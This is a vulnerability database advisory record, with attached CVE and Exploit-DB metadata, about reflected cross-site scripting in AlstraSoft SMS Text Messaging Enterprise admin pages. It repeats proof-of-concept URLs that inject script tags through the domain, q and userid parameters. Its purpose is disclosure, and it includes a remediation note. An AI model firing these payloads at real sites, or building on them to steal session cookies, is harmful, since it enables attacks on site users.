ID OSVDB:37867
Type osvdb
Reporter OSVDB
Modified 2007-07-22T00:00:00
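Description
Cross-site scripting (XSS) in AlstraSoft SMS Text Messaging Enterprise (CVE-2007-4079): admin/membersearch.php does not properly sanitize the domain and q parameters, so script placed in the URL can run in the browser of a user who opens the link, in the context of the affected site. The related userid issue in admin/edituser.php is tracked separately as OSVDB:37868. This entry lists no fixed version; the usual remedy for this class of issue is to HTML-encode request parameters before writing them into the page.
Manual Testing Notes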
http://[Victim]/admin/membersearch.php?pagina=17&q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://[Victim]/admin/membersearch.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit
References:
Related OSVDB ID: 37868
Other Advisory URL: http://lostmon.blogspot.com/2007/07/alstrasoft-multiple-products-multiple.html
CVE-2007-4079
Bugtraq ID: 25022
{"href": "https://vulners.com/osvdb/OSVDB:37867", "id": "OSVDB:37867", "reporter": "OSVDB", "published": "2007-07-22T00:00:00", "description": "## Manual Testing Notes\nhttp://[Victim]/admin/membersearch.php?pagina=17&q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E\nhttp://[Victim]/admin/membersearch.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit\n## References:\n[Related OSVDB ID: 37868](https://vulners.com/osvdb/OSVDB:37868)\nOther Advisory URL: http://lostmon.blogspot.com/2007/07/alstrasoft-multiple-products-multiple.html\n[CVE-2007-4079](https://vulners.com/cve/CVE-2007-4079)\nBugtraq ID: 25022\n", "title": "AlstraSoft SMS Text Messaging Enterprise admin/membersearch.php Multiple Variable XSS", "lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "references": [], "edition": 1, "cvelist": ["CVE-2007-4079"], "affectedSoftware": [], "viewCount": 1, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2017-04-28T13:20:33", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4079"]}, {"type": "osvdb", "idList": ["OSVDB:37868"]}, {"type": "exploitdb", "idList": ["EDB-ID:30367", "EDB-ID:30368"]}], "modified": "2017-04-28T13:20:33", "rev": 2}, "vulnersScore": 5.7}, "modified": "2007-07-22T00:00:00"}
{"cve": [{"lastseen": "2020-10-03T11:45:53", "description": "Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft SMS Text Messaging Enterprise allow remote attackers to inject arbitrary web script or HTML via the (1) domain or (2) q parameter to (a) admin/membersearch.php, or (3) the userid parameter to (b) admin/edituser.php.", "edition": 3, "cvss3": {}, "published": "2007-07-30T17:30:00", "title": "CVE-2007-4079", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4079"], "modified": "2008-11-15T06:55:00", "cpe": ["cpe:/a:alstrasoft:sms_text_messaging_enterprise:*"], "id": "CVE-2007-4079", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4079", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:alstrasoft:sms_text_messaging_enterprise:*:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-4079"], "description": "## Manual Testing Notes\nhttp://[Victim]/admin/edituser.php?userid=Walltrapas\"><script>alert()</script>\n## References:\n[Related OSVDB ID: 37867](https://vulners.com/osvdb/OSVDB:37867)\nOther Advisory URL: http://lostmon.blogspot.com/2007/07/alstrasoft-multiple-products-multiple.html\n[CVE-2007-4079](https://vulners.com/cve/CVE-2007-4079)\nBugtraq ID: 25022\n", "edition": 1, "modified": "2007-07-22T00:00:00", "published": "2007-07-22T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37868", "id": "OSVDB:37868", "title": 
"AlstraSoft SMS Text Messaging Enterprise admin/edituser.php userid Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T12:14:54", "description": "AlstraSoft SMS Text Messaging Enterprise 2.0 admin/membersearch.php Multiple Parameter XSS. CVE-2007-4079 . Webapps exploit for php platform", "published": "2007-07-23T00:00:00", "type": "exploitdb", "title": "AlstraSoft Sms Text Messaging Enterprise 2.0 admin/membersearch.php Multiple Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4079"], "modified": "2007-07-23T00:00:00", "id": "EDB-ID:30367", "href": "https://www.exploit-db.com/exploits/30367/", "sourceData": "source: http://www.securityfocus.com/bid/25022/info\r\n\r\nSMS Text Messaging Enterprise is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. \r\n\r\nhttp://www.example.com/admin/membersearch.php?pagina=17&q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E\r\nhttp://www.example.com/admin/membersearch.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30367/"}, {"lastseen": "2016-02-03T12:15:01", "description": "AlstraSoft SMS Text Messaging Enterprise 2.0 admin/edituser.php userid Parameter XSS. CVE-2007-4079 . 
Webapps exploit for php platform", "published": "2007-07-23T00:00:00", "type": "exploitdb", "title": "AlstraSoft Sms Text Messaging Enterprise 2.0 admin/edituser.php userid Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4079"], "modified": "2007-07-23T00:00:00", "id": "EDB-ID:30368", "href": "https://www.exploit-db.com/exploits/30368/", "sourceData": "source: http://www.securityfocus.com/bid/25022/info\r\n \r\nSMS Text Messaging Enterprise is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.\r\n \r\nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.\r\n \r\nhttp://www.example.com/admin/edituser.php?userid=Walltrapas\"><script>alert()</script> ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30368/"}]}